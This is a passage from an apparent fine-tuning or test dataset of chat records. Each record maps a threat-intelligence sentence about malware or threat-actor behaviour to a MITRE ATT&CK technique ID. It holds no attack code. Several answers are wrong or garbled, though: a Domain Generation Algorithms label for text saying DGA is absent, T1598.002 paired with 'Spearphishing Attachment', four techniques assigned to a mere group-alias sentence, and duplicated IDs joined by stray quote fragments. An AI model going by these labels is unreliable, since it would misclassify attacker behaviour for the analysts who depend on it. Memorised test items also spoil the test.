- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For this analysis, we looked at version 2.14.845, which has a configuration that differs from the others Dreambot versions in that the domain generation algorithm (DGA) is not used: therefore, the DGA variables and parameters are missing"
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. This process runs as a high-integrity process by default, since its set to auto-elevate within its manifest"
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "China Chopper's server component can upload local files."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon deletes one of its files, 2.hwp, from the endpoint after establishing persistence."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ‘vsnet’ plugin was intended to spread and launch a payload (BlackEnergy2 dropper itself at the moment) in the local network by using PsExec, as well as gaining primary information on the user’s computer and network. It was a ddos tool compiled to run on ARM systems"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar has the ability to identify domain administrator accounts."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has attached a malicious document to an email to gain initial access."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates new services to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can timestomp files on victims using a Web shell."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is distributed as a set of scripts and encrypted files and utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actor using appcmd to delete logs and disable logging"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware has the ability to regularly take screenshots; what’s more, it takes screenshots when certain “interesting” applications are run, for instance, IM’s. Screenshots are stored in compressed format and are regularly sent to the C&C server – just like the audio recordings"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner used the \"ps\" command to monitor the running processes on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LaZagne can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can obtain the computer name, OS version, and default language identifier."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor can collect any files found in the enumerated drivers before sending it to its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon creates a base directory that contains the files and folders that are collected."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MSTIC previously tracked ACTINIUM activity as DEV-0157, and this group is also referred to publicly as Gamaredon"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1608.001 - Upload Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KARAE can collect system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to delete files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat actor known as Silent Librarian/TA407/COBALT DICKENS has been actively targeting universities via spear phishing campaigns since schools and universities went back"
- },
- {
- "role": "assistant",
- "content": "T1608.005 - Link Target"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has sent data to its C2 server via \"POST\" requests."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amadey has collected the computer name and OS version from a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hancitor has the ability to download additional files from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can set a scheduled task on the target system to execute commands remotely using at."
- },
- {
- "role": "assistant",
- "content": "T1053.002 - Scheduled Task/Job: At"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AnyDesk has been the most common legitimate desktop software used to establish an interactive command and control channel, with ConnectWise seen slightly less frequently."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software', 'T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis obfuscates its code and encrypts the API names. Denis also encodes its payload in Base64."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used the legitimate Windows services `IKEEXT` and `PrintNotify` to side-load malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has obtained and used Empire to deploy agents."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla, also known as Snake, is an infamous espionage group recognized for its complex malware. To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. This allows them to bypass detection that can trigger when a malicious executable is dropped on disk"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao's backdoors have been written in Python and compiled with py2exe."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains code to clear event logs."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Spalax, the threat actors relied on a victim to click on a malicious link distributed via phishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can parse the `ProxyServer` string in the Registry to discover http proxies."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After these strings are decrypted, the malware will load a series of Microsoft Windows API calls to be used later on. After these functions are loaded, Comnie determines if it is running within the %TEMP% directory of the victim machine. In the event it is not running within this directory, it will copy itself to %TEMP% and execute this newly created file with an argument of the original file’s path. A total of 64MB of garbage data is appended to this copied file, likely as a way to deter any security products in place that may be scanning files on disk. After running within the %TEMP% path, Comnie will delete the original file. After Comnie has been copied to the %TEMP% directory, it will look for the presence of the ‘DQuit.tmp’ file in this path. It is unclear how this file is used exactly, as it does not appear to ever be written during runtime by Comnie. Comnie continue to enter its installation routine. In doing so, it will attempt to detect the following Anti-Virus products via various techniques"
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER can use HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROCKBOOT is a Master Boot Record (MBR) bootkit that uses the MBR to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 used PowerShell commands to execute payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pillowmint has been decompressed by included shellcode prior to being launched."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Credentials that have either been reused across multiple platforms or have previously been exposed. Additionally, this includes VPN accounts - not just domain and local accounts."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This log contains the external IP, the geographic location, the machine name, the time the machine was infected, as well as fields to be logged in the threat actor’s database"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host', 'T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This location data gives the attacker a unique edge, as they can specify a target country or city to attack and maximize their accuracy when choosing a particular target. The .txt file contains information about the C2 domain and infected machine, as detected in a Cybereason Lab environment"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Throughout our StellarParticle investigations, CrowdStrike identified what appeared to be a VBScript-based Active Directory enumeration toolkit. While the script’s contents have not been recovered to date, CrowdStrike has observed identical artifacts across multiple StellarParticle engagements that suggest the same or similar tool was used"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used Cobalt Strike C2 beacons for data exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used their own web shells, as well as those previously placed on target systems by other threat actors, for reconnaissance and lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "esentutl can be used to copy files from a given URL."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As we can see, it simply downloads a file from secure.dropinbox[.]pw using HTTP on port 443 (not HTTPS), and proceeds to decrypt the file using AES-128 prior to executing it. At this point, Cardinal RAT has been downloaded and executed, and execution is directed to this sample. Of course, the Carp Downloader is not required to download Cardinal RAT, however, based on our visibility, it has exclusively done so"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has used HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper extracts the communications and wiper components from resources named “PKCS7” and “PKCS12” respectively, while the x86 sample extracts the x64 variant of Disttrack from a resource named “X509”. To extract the components, the dropper is configured to seek specific offsets within the resource, read a specified number of bytes and decrypt the contents using a specified key. The key exists in the sample as a base64 encoded string that the dropper will decode then use each byte of the resulting string to XOR the data obtained from the resource. When determining the location of the ciphertext within the resource, the dropper subtracts 14 from the offset value in the sample’s configuration as an additional layer of obfuscation. Table 1 shows the resources within the Disttrack x86 sample, the component it contains and the values needed to decrypt its contents."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses netstat -ano to search for specific IP address ranges."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use Regsvr32 to execute malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fysbis has masqueraded as the rsyncd and dbus-inotifier services."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT executes commands remotely on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo's C2 communication has been encrypted using OpenSSL."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors archived collected files with WinRAR, prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon can use a malicious VBS file for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "connects to port 80 of a C2 server using Wininet API."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has communicated with hosts over raw TCP on port 9999."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unit 42 has discovered activity involving threat actors responsible for the OilRig campaign with a potential link to a threat group known as GreenBug. Symantec first reported on this group back in January 2017, detailing their operations and using a custom information stealing Trojan called ISMDoor"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADCALL functions as a proxy server between the victim and C2 server."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook has modules that are capable of capturing video from a victim's webcam."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At installation, the MSI file drops three files and creates one hidden directory (UFile) into C:\\ProgramData\\Apple\\Update\\, likely as a ruse"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories', 'T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT can download files via DNS."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
